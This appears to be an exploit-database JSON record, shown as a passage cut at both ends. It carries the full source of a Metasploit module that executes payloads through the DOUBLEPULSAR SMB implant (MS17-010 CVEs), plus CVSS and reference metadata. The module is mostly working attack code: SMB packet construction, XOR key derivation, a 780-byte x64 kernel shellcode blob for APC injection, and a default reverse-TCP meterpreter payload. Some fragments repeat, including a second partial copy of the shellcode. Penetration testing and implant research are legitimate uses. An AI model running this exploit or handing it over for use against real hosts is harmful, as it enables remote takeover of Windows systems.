param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-12] #"}, "lastseen": "2021-09-11T22:19:07", "differentElements": ["sourceData"], "edition": 14}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "597fc940e7a4d9e7b77e9d27d8f43f0d", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-09-12T22:15:25", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142603", "PACKETSTORM:142602", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", 
"1337DAY-ID-27803", "1337DAY-ID-27786", "1337DAY-ID-29702", "1337DAY-ID-27802", "1337DAY-ID-27752"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:42031", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0147"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96706", "SMNTC-96709", "SMNTC-96703", "SMNTC-96707", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": 
"trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0148", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-09-11T22:19:07", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-09-11T22:19:07", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current 
source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 
'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n 